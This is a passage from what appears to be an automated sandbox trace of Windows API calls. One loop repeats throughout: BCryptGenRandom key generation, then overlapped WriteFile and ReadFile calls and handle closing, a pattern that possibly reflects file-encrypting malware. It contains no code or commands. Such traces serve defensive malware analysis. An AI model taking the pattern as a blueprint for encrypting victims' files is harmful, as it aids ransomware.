pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.705] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.705] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.705] free (_Block=0x3e305b8) [0197.705] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.705] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.705] free (_Block=0x1fa91d0) [0197.705] free (_Block=0x1fa2ed8) [0197.705] free (_Block=0x1fa90b8) [0197.706] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.707] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.707] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.708] CloseHandle (hObject=0x170) returned 1 [0197.708] free (_Block=0x3df0008) [0197.708] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.718] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.718] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.718] free (_Block=0x3e305b8) [0197.718] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.718] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.719] free (_Block=0x1fa91d0) [0197.719] free (_Block=0x1fa2ed8) [0197.719] free (_Block=0x1fa90b8) [0197.719] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.719] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.729] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.729] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.729] CloseHandle (hObject=0x170) returned 1 [0197.729] free (_Block=0x3df0008) [0197.729] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.739] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.739] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.739] free (_Block=0x3e305b8) [0197.739] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.739] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.739] free (_Block=0x1fa91d0) [0197.739] free (_Block=0x1fa2ed8) [0197.739] free (_Block=0x1fa90b8) [0197.739] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.741] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.742] CloseHandle (hObject=0x170) returned 1 [0197.742] free (_Block=0x3df0008) [0197.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.752] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.752] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.753] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.753] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.753] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.753] free (_Block=0x3e305b8) [0197.753] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.753] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.753] free (_Block=0x1fa91d0) [0197.753] free (_Block=0x1fa2ed8) [0197.753] free (_Block=0x1fa90b8) [0197.754] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.754] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.755] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x76f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.756] CloseHandle (hObject=0x170) returned 1 [0197.756] free (_Block=0x3df0008) [0197.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.766] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.767] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.767] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.768] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.768] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.768] free (_Block=0x3e305b8) [0197.768] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.768] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.769] free (_Block=0x1fa91d0) [0197.769] free (_Block=0x1fa2ed8) [0197.769] free (_Block=0x1fa90b8) [0197.769] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.771] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.782] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x20ce, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.783] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.783] CloseHandle (hObject=0x170) returned 1 [0197.783] free (_Block=0x3df0008) [0197.783] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.793] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.793] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.793] free (_Block=0x3e305b8) [0197.793] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.793] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.793] free (_Block=0x1fa91d0) [0197.793] free (_Block=0x1fa2ed8) [0197.793] free (_Block=0x1fa90b8) [0197.793] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.793] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.794] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.806] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5ba, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.806] CloseHandle (hObject=0x170) returned 1 [0197.806] free (_Block=0x3df0008) [0197.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.817] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.817] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.817] free (_Block=0x3e305b8) [0197.817] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.817] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.817] free (_Block=0x1fa91d0) [0197.817] free (_Block=0x1fa2ed8) [0197.817] free (_Block=0x1fa90b8) [0197.817] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.818] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.829] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x78a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.829] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.831] CloseHandle (hObject=0x170) returned 1 [0197.831] free (_Block=0x3df0008) [0197.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.839] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.840] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.840] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.841] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.841] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.841] free (_Block=0x3e305b8) [0197.841] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.841] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.841] free (_Block=0x1fa91d0) [0197.841] free (_Block=0x1fa2ed8) [0197.841] free (_Block=0x1fa90b8) [0197.841] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.842] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.854] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x92c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.854] CloseHandle (hObject=0x170) returned 1 [0197.854] free (_Block=0x3df0008) [0197.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.867] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.867] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.867] free (_Block=0x3e305b8) [0197.867] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.867] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.868] free (_Block=0x1fa91d0) [0197.868] free (_Block=0x1fa2ed8) [0197.868] free (_Block=0x1fa90b8) [0197.868] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.869] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x15f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.869] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.880] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x812, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.880] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.881] CloseHandle (hObject=0x170) returned 1 [0197.881] free (_Block=0x3df0008) [0197.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.890] GetProcAddress (hModule=0x753f0000, 